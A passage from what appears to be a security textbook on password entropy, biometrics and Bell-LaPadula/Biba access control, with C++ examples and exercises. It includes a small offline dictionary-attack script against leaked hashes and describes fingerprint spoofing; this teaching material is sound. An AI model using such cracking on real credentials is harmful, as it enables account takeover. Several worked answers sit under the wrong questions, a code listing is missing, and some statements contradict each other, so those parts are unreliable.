bits) in under 200 seconds. Note that most password authentication schemes do
not allow the attacker access to the encrypted passwords and are thus immune
to such attacks.
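A dictionary attack against a leaked, unsalted hash can be sketched in a few lines. The hash function and word list below are illustrative; real attacks use enormous sorted dictionaries and tools built for the purpose.

```python
import hashlib

def dictionary_attack(target_hash, wordlist):
    # Try candidates one by one, most likely first, comparing hashes.
    for candidate in wordlist:
        if hashlib.sha256(candidate.encode()).hexdigest() == target_hash:
            return candidate
    return None

# Suppose the attacker has obtained this unsalted hash:
leaked = hashlib.sha256(b"letmein").hexdigest()
found = dictionary_attack(leaked, ["123456", "password", "letmein", "qwerty"])
```

Because the attacker holds the hash, every guess can be checked offline without tripping any of the guess-limiting defenses above.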
Choosing Good Passwords
How can one tell whether a chosen password is a “good password”? There are two
considerations:
High entropy Chosen from a very large set of possible values. The more random the password
appears, the more difficult it will be for an attacker to guess.
Easy to remember Easy for a real human to remember without resorting to external and insecure
memory aids. If the user needs to write the password down, then it is easy to
steal.
The entropy challenge is a function of making the password look random. If the
password generation scheme is predictable then the entropy is low and it will be
easy to guess. One technique to maximize entropy is to use a random (actually
“pseudo random” is more accurate) number generator to create the password. A
random number generator must uphold one important property: any person with
full knowledge of and access to the generating system will not be able to predict
the next number in the sequence even if all the previous numbers are known.
Unfortunately, humans are very poor random generators. When ‘randomly'
typing a 10-digit number, humans tend to either alternate hands or use only one
hand. Robust password generation systems rely on truly random natural
phenomena. As these are typically unavailable to the average system, we rely on
pseudo-random number generators. These include direct measurements of
system activity such as process ID, current time, and various performance
metrics. Random number generators including these measurements are much
more secure than the standard C function rand().
Pseudo-random number generators are useful for password generation because
they are very difficult to guess and all passwords are equally likely to be chosen.
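Such a generator is available in most environments. The sketch below uses an operating-system entropy source rather than rand(); the alphabet matches the 94-symbol set used earlier in this chapter.

```python
import secrets
import string

ALPHABET = string.ascii_letters + string.digits + string.punctuation  # n = 94

def generate_password(length=12):
    # secrets draws from the operating system's entropy pool, so the
    # sequence is unpredictable even with full knowledge of the program --
    # unlike rand(), whose output is reproducible from its seed.
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

pw = generate_password()
```

Every character is an independent, uniform draw, so all passwords of a given length are equally likely.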
The second challenge is to make the password easy for a human to remember. If
a system compels people to use a password that is too difficult to remember,
people commonly respond by writing the password down. Possibly the best way
to get around this constraint is to use a “pass phrase” or similar technique to
maximize this trade-off (Yan, Blackwell, Anderson, & Grant, 2004).
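A pass phrase generator can be sketched the same way. The eight-word list below is invented and far too small for real use (giving only 3 bits per word); practical schemes draw from lists of several thousand words.

```python
import math
import secrets

# An invented toy word list; diceware-style schemes use thousands of words.
WORDS = ["correct", "horse", "battery", "staple",
         "orbit", "velvet", "glacier", "mosaic"]

def passphrase(count=4):
    # Each word is an independent, uniform draw from the list.
    return " ".join(secrets.choice(WORDS) for _ in range(count))

phrase = passphrase()
# Entropy in bits: count * log2(list size) -- only 4 * 3 = 12 bits here.
bits = math.floor(4 * math.log2(len(WORDS)))
```

A four-word phrase from a 7,776-word list would instead carry about 51 bits while remaining far easier to remember than “aZ4%”-style strings.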
Handling Passwords
Password authentication is extremely easy: use the strcmp() function or one like
it. Password elicitation is also extremely easy. Little more than an edit control is
required. The most challenging part of handling passwords is storing them in such
a way that an attacker cannot obtain it.
If a password is stored in the source code of a program, in a file, in a packet that
is passed over the network, or even in the code segment of memory as the
program is being executed, then the possibility exists that an attacker can find it.
This is much more straightforward than one might imagine. For example, a
program exists called “strings” which will sift through a file and produce a list
of all text strings contained therein. This produces a very short list of possibilities
in which the real password resides. Clearly a better solution is required. There are
a few general rules of thumb for handling passwords in software:
High encryption Ensure that passwords at rest or in transit always remain in an encrypted state.
The algorithm used to encrypt the passwords must be robust and the password
must be strong. After all, if a weak password is used to encrypt the sensitive data,
then that becomes the weak link!
Access control Ensure that files holding passwords or processes manipulating passwords are in
the most restricted state possible. Never place passwords in a publicly readable
location; this would give the attacker the opportunity to crack the passwords at his or
her leisure.
Zero memory Immediately after a password has been used, whether in a plaintext or encrypted
state, the memory should be overwritten with zeros. Otherwise attackers can
sift through previously-used memory to find password residue.
Hard-code Never hard-code a password in source code. These are extremely easy to recover.
This is especially true with open source software.
Separate states Avoid keeping an entire password in a single location in memory. Ideally some
parts should be stored in the stack and some in the heap. Only bring the parts
together immediately before use. For example, a buffer overrun may make the
heap portion of memory accessible to the attacker. If the entire password resides
in the heap, then it may be disclosed.
One-way encryption Use a one-way encryption algorithm to store a password so it can never be
recovered. This means that it is possible to encrypt the password, but not
possible to decrypt it. To verify that a given password is authentic, it is necessary
to encrypt the candidate password. This is then compared against the stored
encrypted password. In other words, the stored encrypted password is never
decrypted.
Don't make copies Don't pass a password as a parameter; instead pass a pointer. The more copies
made, the more opportunities exist for one to be found by an attacker.
Because passwords are such a high-value asset, it is best to take extreme
precautions when working with them.
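Several of these rules can be illustrated together: compare in a way that leaks nothing through timing, then zero the plaintext buffer. This is a best-effort sketch; the function name is invented, and a garbage-collected language like Python cannot guarantee that no other copies of the password exist in memory.

```python
import hashlib
import hmac

def check_and_zero(candidate, expected_hash):
    # Compare one-way-encrypted values in constant time...
    ok = hmac.compare_digest(hashlib.sha256(bytes(candidate)).digest(),
                             expected_hash)
    # ...then overwrite the plaintext so no residue remains in this buffer.
    for i in range(len(candidate)):
        candidate[i] = 0
    return ok

stored = hashlib.sha256(b"s3cret").digest()  # what the system keeps
typed = bytearray(b"s3cret")                 # the claimant's input, mutable
ok = check_and_zero(typed, stored)
```

A mutable bytearray is used precisely so the zero-memory rule can be applied; an immutable string could not be overwritten in place.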
Who You Are
“Are” authentication schemes, also known as identity-based authentication, tie
principals to entities through direct measurements of the individual. The
underlying assumption of “are-factor” authentication is that individuals are
unique enough that a machine can tell the difference. In the era of mobile
devices, “are” authentication has gone from a niche method used in a handful of
special-case scenarios to something the average person uses every day. The most
commonly used “are” measurement today is a fingerprint.
Who-you-are authentication involves direct measurements of the individual to
identify him or her. Another name for “are” authentication is biometrics, meaning
“a measurement of a living thing.”
A biometric system is essentially a pattern-recognition system that recognizes a
person based on a feature vector derived from a specific physiological or
behavioral characteristic that the person possesses. Depending on the application
context, a biometric system typically operates in one of two modes: verification or
identification.
(Prabhakar, Pankanti, & Jain, 2003)
Properties of Biometrics
For a biometric to serve as an effective authentication mechanism, it must meet
four requirements.
Universality Each individual in the population possesses the characteristic being measured. If,
for example, a valid principal was lacking a finger, then a fingerprint scan would
be an invalid choice. Unfortunately, it is difficult to find a single human
characteristic that is truly universal.
Distinctiveness No two individuals in the population have the exact same form of the
characteristic being measured. This also includes the notion of circumvention, or
how easily the system can be fooled using fraudulent methods. While every two
humans are distinct, it is not always the case that they are distinct enough for a
computer (or, more specifically, a sensor attached to a computer) to tell the
difference.
Permanence The characteristic shouldn't change over time in a given individual.
Unfortunately, every characteristic of every human is in constant flux. It is
therefore necessary to ensure that the range of acceptable variation is
permanent. For example, if a person is 1.9324 meters in height, they might be
1.9321 meters a few moments later depending on how he or she is standing.
Thus a range of 1.932 +/- 0.004 meters would be the acceptable variation.
Collectability The characteristic can be readily measured. This often has several components,
including performance (how long it takes to obtain the measurement) and
acceptability (how much objection the human subject will have regarding the
measurement being taken).
It is extremely difficult to find a biometric that meets all four requirements; the
most commonly used biometrics today fall short in one or two categories. Several
biometrics employed in authentication systems today are fingerprints, eye
scans, voice recognition, face recognition, and a variety of other features that are
unique to a human being.
To implement a biometric authentication mechanism, two functions are required:
enrollment and identification. The first function is the process of gathering data
from a given user. This data will then serve as the key. Of course if an imposter is
able to compromise the enrollment process, the entire authentication
mechanism is compromised. The second function is identification, which uses the same
data gathering mechanism as enrollment to compare a fresh measurement against the enrolled data.
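Because two measurements of the same person never match exactly, the identification step accepts any measurement within a tolerance of the enrolled template. A toy sketch, with invented feature values and threshold:

```python
def euclidean(a, b):
    # Distance between two feature vectors.
    return sum((x - y) ** 2 for x, y in zip(a, b)) ** 0.5

def verify_biometric(enrolled, measured, threshold=0.5):
    # Accept the claimant if the fresh measurement falls within the
    # tolerance of the enrolled template; exact matches never happen.
    return euclidean(enrolled, measured) <= threshold

template = [1.93, 0.42, 7.10]   # invented feature vector from enrollment
```

The threshold embodies the permanence trade-off: too tight and legitimate users are rejected, too loose and impostors are accepted.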
Fingerprints
Fingerprints as a key and fingerprint readers as the lock qualify as “are”
authentication because they meet all three requirements:
Non-transferable Fingerprints of one individual cannot be moved to another.
Non-reproducible Fingers cannot be reproduced.
Human measurement Fingers are part of a human and thus a fingerprint is a measure of a human.
There are several attacks on fingerprint readers which have been proven to be
successful. On the most basic level, an attacker can physically steal the victim’s
hand or finger. This would violate the non-transferable criterion.
Another attack is to carefully map the contours of an individual’s finger and
produce a replica. Some fingerprint readers require a capacitive surface relying
on skin being conductive enough to close an electric circuit. A forged finger with
the correct pattern can accomplish this. One researcher was able to authenticate
on an LG phone by using a hot-glue-gun to make an impression of his finger and
then holding the impression onto his phone.
In 2016, Jan Krissler was able to take a high-resolution picture of the thumb of
Ursula von der Leyen, then the German minister of defense. With this image, he was
able to print a to-scale impression on a transparent sheet using a “thick toner
setting.” The impression was then affixed to a latex glove, and it was able to unlock
the minister’s iPhone. After the demonstration, the minister posed for all future
photographs with her fingers pointed away from the camera.
Krissler then demonstrated how a fingerprint impression can be lifted off of a phone
itself, assuming the user has touched the surface with the authenticated finger.
Given that fingerprint readers are commonly employed as biometrics on phones,
how do they perform as a biometric?
Universality High, but some individuals lack fingerprints. For these people, the patterns on
their hands are still distinct but the indicators typically are not.
Distinctiveness Very high. Commonly cited estimates place the odds of two people
having identical fingerprints at 1 in 64,000,000,000.
Permanence High, though they may be destroyed by accident or intent, fingerprints generally
stay constant throughout an individual’s life.
Collectability Very high, though inexpensive devices are not very accurate.
Based on these criteria, one could trust fingerprints for a phone if readers did a
better job of distinguishing human fingers from imitations.
Facial Recognition
Facial recognition is also commonly used on mobile devices. Does it qualify as an
“are” authentication?
Non-transferable A person’s face cannot be moved to another person.
Non-reproducible A person’s face generally cannot be reproduced, though it can be approximated
with plastic surgery.
Human measurement A face is clearly part of a human.
Since facial recognition is clearly a biometric, how does it perform?
Universality Very High, everyone has a face.
Distinctiveness Very High, but a high fidelity image of a face might be needed to tell the
difference between two similar individuals.
Permanence Low. An individual’s face can change appearance through aging, expressions,
makeup, hair style, sun exposure, and cosmetic surgery.
Collectability Very high, though inexpensive devices are not very accurate.
Human Measurement
One interesting class of “who-you-are” authentication involves determining if a
principal is a member of the “human” entity. In other words, the goal is not to
determine if a given individual is part of a group of trusted users, but rather that
the individual is in fact human.
Human Interactive Proofs (HIPs), also known as captchas, are challenges meant
to be easily solved by humans while remaining too hard to be economically
solved by computers.
Google’s captcha, which had previously been considered to be secure, has been
compromised by a group in Russia. The attack was accomplished by using a
botnet to attempt to crack the HIP challenges, relying on large numbers of
attempts to overcome low success rates.
Figure 10.4: An example of the type of text a HIP would present to the user
Examples
1. Q Identify the type of authentication used (have, know, or are) in the following
spy scenario: I knock on the door and my assistant answers through the door
“who is it?” I reply “It is me!”
2. Q Identify the type of authentication used (have, know, or are) in the following
spy scenario: I walk into the back room of a pawn shop and am met by a brawny
thug carrying a gun. He tells me to get lost. I reply “Skinny Joe sent me.” He lets
me in.
A Know: Apparently the name “Skinny Joe” is the key word gaining me
admittance. This name can be transferred or duplicated through memorization.
3. Q Identify the type of authentication used (have, know, or are) in the following
spy scenario: I walk into my favorite restaurant. The waiter greets me at the
door and directs me to a special table in the back.
4. Q Identify the type of authentication used (have, know, or are) in the following
spy scenario: As I begin some high-level negotiations, I offer my hand to shake.
My opponent recognizes the ring I am wearing which identifies me as a member
of his secret society. Based on this association, he gives me some top-secret
information.
A Have: The ring is a token which identifies me. The ring can be transferred but
presumably not easily duplicated.
5. Q Identify the type of authentication used (have, know, or are) in the following
spy scenario: Over a game of cards, I let slip a curious turn of phrase which
identifies me as being involved in an event that happened earlier in the week.
6. Q Design a novel authentication strategy for a mobile phone. There are several
constraints:
• The phone could get lost and we don't want others to use it.
• Authentication must be extremely fast.
• Authentication must be 100% reliable.
• I will be observed while using the phone.
A I will embed an RFID chip in a bracelet or on the band of a watch. There will be a
sensor in the phone which will deactivate it when the distance is greater than a
couple of feet, and activate it when the sensor is in range again. This is a form of
“what you have” authentication. It presumably cannot be duplicated but is easy
to transfer.
7. Q Mercedes-Benz has a special key that has no metal and the lock itself has no
moving parts. The car shoots an infrared laser into the key and, depending on
the generated rolling code sent back, determines if the key is authenticated.
Does this key satisfy the requirements for What You Have authentication?
8. Q My street gang uses tattoos to determine membership. Does this tattoo satisfy
the requirements for what you have authentication?
A There is just one token and that token appears to be a digit. Therefore m = 1
because the length is one and n = 10 because there are ten digits. log2(n^m) =
log2(10^1) = log2(10) ≈ 3 bits.
A There are several ways to answer this. First, m = 8 because there are eight
tokens and n = 42 because there are digits (10) and symbols (32). log2(n^m) =
log2(42^8) = log2(9,682,651,996,416) ≈ 43 bits. However, the discerning eye
might realize that this is just a phone number. There are 7,919,000 unique
phone numbers for a given area code. This is because the first digit cannot be a
1 or 0. Also the last two digits cannot both be 1. Finally, many “555” numbers
are not used. This yields: log2(7,919,000) ≈ 22 bits (almost 23). Since 43 is larger
than 22, the true bit strength is 22.
A These are two Japanese characters. Some research on the Internet reveals that
there are about 85,000 characters, but only 2,136 are taught in school. These
two are of that reduced set. Therefore m = 2 because the length is two and n =
2,136. log2(n^m) = log2(2,136^2) = log2(4,562,496) ≈ 22 bits.
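The arithmetic in these answers can be double-checked with the formula bits = m · log2(n); a quick sketch:

```cpp
#include <cassert>
#include <cmath>

// bit strength of m tokens drawn from an alphabet of n symbols
double bits(double n, double m) { return m * std::log2(n); }

// bits(10, 1)   -> about 3.3  (one digit)
// bits(42, 8)   -> about 43.1 (eight tokens over 42 symbols)
// bits(2136, 2) -> about 22.1 (two common Japanese characters)
```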
12. Q Consider signature as a possible form of biometric. Is it an appropriate form of
who you are authentication? Analyze it according to the four categories.
Exercises
1 For each of the following, identify the type of authentication used (have, know,
or are):
• Text password
• Fingerprint
• Online credit card authorization
• Credit card in a café
• Biometric
• PIN (Personal Identification Number)
• Token
• Key to my house
• I Learn NetID
• Credit card purchase at a store
• ATM withdrawal
• Your professor
• Signature
3 Recite from memory the two criteria for “have” authentication. For each, give
an example of a have authentication scheme that meets the requirement and
one that fails the requirement.
6 Please read the following article.
Yan, J., Blackwell, A., Anderson, R., & Grant, A. (2004, September). The
Memorability and Security of Passwords - Some Empirical Results. IEEE Security
and Privacy, 2(5), 25-31.
Based on that article, define each type of attack in your own words:
• Dictionary attack
• Permutation of words and numbers
• User information attack
• Brute force attack
8 Recite and describe the two criteria for good “who you are” authentication.
9 According to the four criteria for biometrics enumerated above, classify the
suitability of the following measurements for authentication purposes:
• Footprint
• DNA
• Length of ring finger
• Voice
• Typing characteristics
• Speech patterns such as inflection
• Emotional response to images
Problems
1 Design an authentication strategy for a waitress station where the waitress
enters orders and prints out the bill. There are several constraints:
• She will be observed when she interacts with it.
• Speed is important.
• She has at most one hand.
• It must be difficult for someone to impersonate her.
5 Write a program to first prompt the user for his password. With this string,
determine how many combinations of passwords exist in this set. In other
words, given the length of the password (length of the string) and the
complexity of the password (numbers, letters, and symbols), how large is the
set of passwords represented by the user’s example? Finally, determine the bit
equivalence based on the number of combinations.
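One possible approach to the core computation of this problem, sketched as a helper function. The character-set sizes (26 lower-case, 26 upper-case, 10 digits, 32 symbols) follow the chapter's earlier examples, and the main() that prompts for the password is omitted:

```cpp
#include <cassert>
#include <cctype>
#include <cmath>
#include <string>

// Determine which character classes the sample password draws from,
// compute n (the alphabet size) and m (the length), and return log2(n^m).
double bitEquivalence(const std::string & password)
{
   bool lower = false, upper = false, digit = false, symbol = false;
   for (std::string::size_type i = 0; i < password.length(); i++)
   {
      unsigned char c = password[i];
      if      (std::islower(c)) lower  = true;
      else if (std::isupper(c)) upper  = true;
      else if (std::isdigit(c)) digit  = true;
      else                      symbol = true;
   }
   int n = (lower ? 26 : 0) + (upper ? 26 : 0)
         + (digit ? 10 : 0) + (symbol ? 32 : 0);
   return password.length() * std::log2((double)n); // bits = m * log2(n)
}
```

A full solution would read the password with std::getline() and print the returned bit equivalence.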
8 In 2017, Apple Inc. introduced a new authentication scheme called “Face ID.”
Research this scheme, classify it (Have? Know? Are? Multi-factor?), and evaluate
it according to the criteria presented in the chapter.
Chapter 11: Access Control
The important skill of this chapter is to know how to add access control mechanisms into existing code
so as to provide confidentiality and integrity assurances on multi-user systems.
To see how this works, imagine three scenarios: a word processor, financial
software, and a music subscription service.
Example: Word Processor
Imagine a single-user system such as a word processor. As with all editors, this
system allows a user to create and view data. Of the three security assurances
(confidentiality, integrity, and availability), only availability is relevant. How can
the system offer confidentiality assurances unless there is another user on the
system from whom the author’s data is to be kept? The same, of course, is true
with integrity. This system thus performs no authentication and as a result makes
no distinction as to what access to data or functionality a given user may have.
Systems such as this have no access control mechanisms.
Example: Personal Finance Software
Now, imagine a slightly more complex system: personal financial software. This
program allows the user to enter financial information, create reports, and
interact with financial institutions such as a bank. There are two sets or groups of
users in this scenario: those who are permitted access to the data and those who
are not. It is up to the system to identify which group a given user is a member
of, and it is up to the system to provide a different level of access control
according to this identification. The first requirement is handled by the process
of authentication. Notice how authentication was not required in our single-user
system previously discussed. The second requirement involves a trivial degree of
access control. Based on the outcome of the authentication, the system either
facilitates or denies access to the data. Systems such as these have trivial access
control mechanisms.
Example: Music Subscription Service
Finally, imagine a music subscription service. In this scenario, one user sets up a
family account and five related accounts constituting a family membership. The
initial user enters payment information, institutes parental controls, and
identifies the devices on which the streamed music may be played. The rest of the
family is also given a user name and password, but this pertains only to their
sub-account. In other words, they do not have access to the other accounts in the
family membership. This scenario is quite a bit more complex than our previous
two. Here we have multiple users on the system, each having specific and
perhaps unique access to system resources and data. The system must
authenticate each user so as to determine who they are. Based on this
determination, the system must then allow and deny access to various assets
based on a potentially complex policy.
Perhaps the most familiar access control system can be found on a multi-user
operating system. The system allows or denies access to various system resources
based on the outcome of the authentication process. However, all multi-user
software systems have some form of access control in them as well. In other
words, it is not uncommon to have to implement a rudimentary access control
mechanism within a single program. This chapter will present three access control
mechanisms which are useful in these scenarios: one offering only confidentiality
assurances, one offering only integrity assurances, and a final mechanism offering
both.
Confidentiality
Many software systems need only to provide confidentiality assurances to the
users: assurances that confidential data will not be disclosed to less trusted
members of the system or to people outside the system. One common example
of this is the military.
Imagine a colonel preparing for a large-scale military campaign during a war.
Clearly, the colonel does not wish the enemy to learn anything of this operation.
However, there are several details that the soldiers in the field need to know
about. The sergeants are privy to more detailed information. Finally, his
lieutenants have access to even more. In order to manage this, a security
clearance system is instituted:
Top Secret The colonel and select members of his staff who need to see the big picture and
are aware of all aspects of the upcoming battle.
Secret The lieutenants and other low-ranking officers. They are given control of
specific operations in the upcoming battle.
Confidential The sergeants who need to organize and coordinate a dozen soldiers.
Public Trust The soldiers on the field. They need to have only a very general understanding
of the campaign.
Unclassified Non-combatants and presumably the enemy. They should know nothing.
All of the military plans are stored on a web site. When a user logs into the system,
they are presented plans for the oncoming campaign based on their level of
access. In other words, everyone with the “Secret” classification is given access
to the same set of plans.
Mathematical Model
Modern security systems must be backed by mathematical models so the degree
of assurances they offer can be established with formal proofs. As computer
systems were being developed in the late 1960s to store classified information,
a need arose for a confidentiality-based access control system to
provide the needed assurances.
David Bell and Len La Padula developed the Bell-LaPadula model in 1972 to meet
this need (Bell & LaPadula, 1973). Not only did they describe the data structures
and algorithms necessary to provide confidentiality assurances, but they also
developed the mathematical model and associated proofs. The core of the model
consists of the following components:
S Bell and LaPadula define this as subjects, namely “processes, programs in
execution.”
O These are objects or assets on the system to be protected.
C The classification of security levels. One of these would be Top Secret in the
military example.
A Access attributes, or a request to read or write to an object/asset.
R A request for access to an object. The access control system is to accept or deny
this request.
D Decision or the result of the request. This is a Boolean value.
Bell-LaPadula
With this system, both an asset and a user are given clearances based on a linear
scale. At validation time, access is granted if the user possesses the same or
greater clearance than the asset. This has several outcomes:
Read-down permitted: An individual with a high clearance (e.g. Secret) can read documents of
lower clearance (e.g. Confidential).
Write-down restricted: An individual possessing high clearance information (e.g. Top Secret) cannot
write to a document of lower clearance (e.g. Public). Doing so would risk
disclosure of confidential information. Instead, either the sensitivity of the asset
is increased to that of the author, or the author is denied permission to write.
Read-up restricted: An individual of low clearance (e.g. Secret) cannot read a document of higher
clearance (e.g. Top Secret). To do so would yield disclosure.
Implementation
Implementations of the Bell-LaPadula include the following components: control,
asset control, subject control, security conditions, and integration.
Control
Bell and LaPadula call this value “control,” defined as the level of access. It can
easily be represented with an integer variable. By
convention, the higher the number, the more access is allowed. Thus 0 is defined
as “no access” or “most limited access.”
In our military example, we can represent control as an integer or an
enumeration. For example:
enum Control
{
UNCLASSIFIED, PUBLIC, CONFIDENTIAL, SECRET, TOP_SECRET
};
This variable is typically stored in a class associated with the asset to be protected.
It is typically set at object creation time and represents what level of control a
given user must have to access this asset.
Subject Control
Each subject wishing to obtain access to the asset is also given a control value Cs.
This value is assigned at authentication time. In other words, the purpose of the
authentication process in Bell-LaPadula is to assign a subject control to a given
user:
Control authenticate(string username, string password);
Recall that there are a finite number of control levels in a given Bell-LaPadula
system. In practice, there are rarely more than a half dozen. This means that the
authentication process assigns a potentially large number of possible users into a
very small number of control levels.
Back to our military example: the colonel has granted TOP_SECRET to himself and
fifteen members of his staff. These constitute the only people in the organization
who have access to every document in the system and can view the complete
battle plan. One of the members of the staff is Larry, a logistics specialist. When
Larry logs into the system, he is given exactly the same subject control value as
the colonel. In other words, all members of a given security level are treated
exactly the same in Bell-LaPadula.
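To make this concrete, a minimal sketch of such an authenticate() function follows. The user table and its names are illustrative assumptions, and the password check is omitted:

```cpp
#include <cassert>
#include <map>
#include <string>

enum Control { UNCLASSIFIED, PUBLIC, CONFIDENTIAL, SECRET, TOP_SECRET };

// A hypothetical user table: many possible users collapse onto just
// five control levels. The usernames below are illustrative only.
Control authenticate(const std::string & username, const std::string & password)
{
   static const std::map<std::string, Control> users =
   {
      { "colonel", TOP_SECRET   },  // the colonel himself
      { "larry",   TOP_SECRET   },  // logistics specialist on the staff
      { "sgtRock", CONFIDENTIAL }   // a sergeant coordinating a dozen soldiers
   };
   // (password verification omitted for brevity)
   std::map<std::string, Control>::const_iterator it = users.find(username);
   return (it == users.end()) ? UNCLASSIFIED : it->second;
}
```

However many users are added to the table, the function can only ever return one of the five Control values.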
Security Condition
The next part of the Bell-LaPadula system is to determine whether a given request
for asset access is to be accepted or rejected. This is called the security condition.
This condition takes two parameters (the subject control and the asset control)
and returns a Boolean value (allow access or not).
In the read condition, the security condition needs to verify that the level of the
subject is at least as large as that of the asset. This can be handled with a simple
greater-than or equal-to operation Cs ≥ Ca.
bool securityConditionRead(Control assetControl,   /* asset */
                           Control subjectControl  /* user  */)
{
   return subjectControl >= assetControl;
}
Notice that any requests to view a given asset will be rejected if the subject
control (the security clearance of the user) is not as high as that of the asset.
In the write condition, everything is opposite. Here the system needs to ensure
that confidential information is not leaked to untrusted subjects. What would
happen if someone possessing secrets let something slip? There are many
examples in U.S. history where a President mistakenly mentioned secret
information to a member of the public press! To protect against this eventuality,
Bell-LaPadula only allows subjects to write to assets that have at least the same
security clearance as the subject. Back to our military example, this means that data from
untrusted sources can find itself in any asset in the system. However, the colonel
can only write to TOP_SECRET documents. This security condition can also be
handled with a simple less-than or equal-to operation: Cs ≤ Ca.
bool securityConditionWrite(Control assetControl,   /* asset */
                            Control subjectControl  /* user  */)
{
   return subjectControl <= assetControl; // opposite of the read!
}
Notice how the write security condition is exactly opposite of the read condition.
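To see the two conditions side by side, here is a self-contained sketch (the enum is repeated so the fragment stands alone) showing a SECRET subject against a CONFIDENTIAL asset:

```cpp
#include <cassert>

enum Control { UNCLASSIFIED, PUBLIC, CONFIDENTIAL, SECRET, TOP_SECRET };

// Read: the subject's clearance must meet or exceed the asset's (Cs >= Ca).
bool securityConditionRead(Control assetControl, Control subjectControl)
{
   return subjectControl >= assetControl;
}

// Write: the asset's clearance must meet or exceed the subject's (Cs <= Ca).
bool securityConditionWrite(Control assetControl, Control subjectControl)
{
   return subjectControl <= assetControl;
}

// A SECRET subject and a CONFIDENTIAL asset:
//   securityConditionRead (CONFIDENTIAL, SECRET) -> true  (read-down permitted)
//   securityConditionWrite(CONFIDENTIAL, SECRET) -> false (write-down restricted)
```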
Integration
To make an access control implementation sound, the programmer must put
security condition checks at all trust boundary junctions. In other words, every
avenue into and out of the asset must be checked. This will be demonstrated in
the context of a simple program to store a collection of military plans:
Figure 11.1: DFD of a class before any access control mechanisms are added
The code necessary to implement this simple program is the following: two
methods and one member variable.
class PlanCollection
{
public:
string getPlan(string name)
{
return plans[name];
}
void setPlan(string name, string plan)
{
plans[name] = plan;
}
private:
map <string /*name*/, string /*plan*/> plans;
};
Notice how all of the plans are stored in a single data structure: the plans map.
When a user asks for a plan by name through the getPlan() method, a
string containing the plan is returned. When a user adds a new plan to the collection with
setPlan(), the plan is stored in the collection.
Here, no security mechanisms exist. A given plan can be retrieved or added
without any verification of the security level of the user. We will now retro-fit this
program with the Bell-LaPadula access control mechanism. There are two main
ways to do this: asset-level checks or collection-level checks.
Asset-level checks involve placing security condition checks on the assets
themselves. In this case, we will add security checks on the plan. In our original
example, a plan was stored as a single string. Now it will be a class.
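The Plan class listing itself did not survive in this copy. A sketch consistent with the surrounding description, and with the parallel Story class later in the chapter, might look like the following; the inline condition bodies are assumptions:

```cpp
#include <cassert>
#include <string>
using namespace std;

enum Control { UNCLASSIFIED, PUBLIC, CONFIDENTIAL, SECRET, TOP_SECRET };

class Plan
{
public:
   Plan(Control assetControl) : assetControl(assetControl) {}

   // read: the subject's clearance must meet or exceed the asset's
   string get(Control subjectControl) const
   {
      if (!securityConditionRead(assetControl, subjectControl))
         throw "Read denied";
      return plan;
   }

   // write: the asset's clearance must meet or exceed the subject's
   void update(const string & plan, Control subjectControl)
   {
      if (!securityConditionWrite(assetControl, subjectControl))
         throw "Write denied";
      this->plan = plan;
   }

private:
   string plan;
   Control assetControl;

   bool securityConditionRead(Control a, Control s) const { return s >= a; }
   bool securityConditionWrite(Control a, Control s) const { return s <= a; }
};
```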
From this code we can see that the only access to the plan is through the two
public interfaces: get() and update(). This Plan class now resides in our
PlanCollections class:
Figure 11.3: DFD of adding access control to a data structure embedded in a class
Notice how every instance of Plan is protected as it travels into and out of the
class. The PlanCollection container is unaware of the access control
mechanism. The code is:
class PlanCollection
{
… code removed for brevity …
map <string /*name*/, Plan> plans;
};
The second way to integrate Bell-LaPadula is to place the security condition
checks on the container that manages all the assets. The member data of
PlanCollection now becomes:
private:
   map <string, string> plans;         // name of plan and the contents
   map <string, Control> accessRights; // who can access a given plan
The data structure holding all the plans (the plans map) contains no access
control mechanisms whatsoever. Anyone who has access to the plans member
variable has complete access to all of the plans stored in the system. To protect
this asset, we have another map called accessRights. This carries all of the
access rights for every plan in the plans data structure. Now, when getPlan()
requests a plan, it will verify that the requester has the necessary rights:
string PlanCollection::getPlan(const string & name, Control subject) const throw (char *)
{
   Control control = accessRights.at(name); // find the control level of this plan
   if (!securityConditionRead(control, subject))
      throw "Read denied";
   return plans.at(name);
}
Integrity
Bell-LaPadula makes confidentiality assurances to the user, but it makes no
integrity assurances. In other words, the most untrusted subject on the system
can write to every single asset in the system. How can the users of the system be
assured that everything has not been corrupted?
Consider the following scenario: a newspaper is collecting information from
various sources to create an article. It is the goal of the editor of the newspaper
to ensure that everything printed is accurate and true. In other words, only a
small portion of the collected data is fit for print. The rest must be treated as
rumor and left out of the article. To address this need, the editor has identified
several levels of trust:
Verified Facts are double-checked and ready to print.
Primary Information came from a first-hand account.
Secondary Information came from an expert in the field.
Preliminary Information came from an unverified source, but is probably true.
Unsubstantiated Information came from rumor, hunch, or intuition.
For example, a newspaper or a journal cares less about confidentiality than
integrity; they just need assurances that their works are of a known level of
quality.
Mathematical Model
Bell-LaPadula’s model only provided confidentiality assurances but did nothing to
ensure that the integrity of the system is protected. To address this need,
Kenneth J. Biba created the Biba model in 1975 (Biba, 1975). To do this, Biba
realized that integrity is essentially the same problem as confidentiality, only
reversed. This is why the Biba model is often called the Bell-LaPadula model turned upside-down.
s Bell and LaPadula define this as subjects, namely “processes, programs in
execution.” Biba defined this as a set of subjects, each individual subject
represented with a lowercase s.
o Bell and LaPadula defined this as objects or assets on the system to be
protected. Biba did the same, though again emphasizing that O represents a set
of objects, each individual member is the lowercase o.
I Bell and LaPadula defined classification levels as C whereas Biba defined
integrity levels as I. Though the meaning is completely different, they function
the same.
il A function returning the integrity level (I) for a given subject.
Biba
As with the Bell-LaPadula system, both an asset and a user are given trust levels
based on a linear scale. At validation time, write permission is granted if the user
possesses the same or greater level of trust as the asset. This has several
outcomes:
Read-down restricted: An individual with a high trust level (e.g. Secondary source) cannot read
documents of lower levels of trust (e.g. Preliminary source). Doing so would run
the risk that incorrect or untrustworthy ideas would damage the integrity of the
new work.
Write-down permitted: An individual possessing a high degree of trust (e.g. Primary source) can write to a
document of lower trust (e.g. Preliminary source). For example, a scientist
can write to a Wikipedia article.
Read-up permitted: An individual of low trust (e.g. Unsubstantiated source) can read a document of
higher trust (e.g. Primary source). For example, a member of the public can
read a scientific article.
Write-up restricted: An individual of low trust (e.g. Preliminary source) is not allowed to write to a
highly trusted document. In this case, the document’s trust level would have to
be lowered to match the author.
The Biba model also allows for auditing to detect and reverse errors as well as a
way to account for who made what changes to the data.
Implementation
As with the Bell-LaPadula model, there are many scenarios when one would wish
to implement Biba within a system to guarantee data integrity. Implementation
of the Biba model is similar to that of the Bell-LaPadula model: the integrity level,
the protection level, the control value, the security condition, and the integration
to the host system.
Integrity Level
The integrity level captures a notion of “level of trust.” Biba calls these “integrity
